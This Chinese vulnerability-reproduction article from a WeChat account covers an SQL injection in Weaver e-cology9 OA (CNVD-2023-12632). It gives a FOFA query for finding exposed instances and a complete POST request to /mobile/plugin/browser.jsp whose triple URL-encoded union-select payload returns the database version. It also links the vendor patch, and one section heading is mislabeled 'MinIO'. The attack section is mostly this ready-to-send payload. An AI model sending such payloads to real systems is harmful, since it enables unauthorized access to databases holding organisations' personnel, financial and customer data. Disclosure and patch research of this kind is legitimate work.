泛微 OA e-cology9 存在 sql 注入

泛微 OA e-cology9 存在 sql 注入

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. MinIO 简介

微信公众号搜索：南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

泛微 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统，包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境，突破企业人、财、物、信息、流程等各种资源之间的屏障，并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上，使企业变成一个电子化的内外部协同工作的组织。

2.漏洞描述

泛微 ecology9 存在 SQL 注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。

CVE 编号:
CNNVD 编号:
CNVD 编号:CNVD-2023-12632

3.影响版本

泛微 e-cology V9 < 10.56

4.fofa 查询语句

app=“泛微-协同商务系统”

5.漏洞复现

漏洞链接：http://127.0.0.1/mobile/plugin/browser.jsp
漏洞数据包：

POST /mobile/plugin/browser.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

keyword参数后面的值是

a' union select 1,''+(SELECT @@VERSION)+'

经过三次url编码得到的

通过注入漏洞爆出数据库版本

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现27 即可获得该 POC 工具下载地址：

7.整改意见

厂商已经更新补丁，修复方案：https://www.weaver.com.cn/cs/securityDownload.asp#

8.往期回顾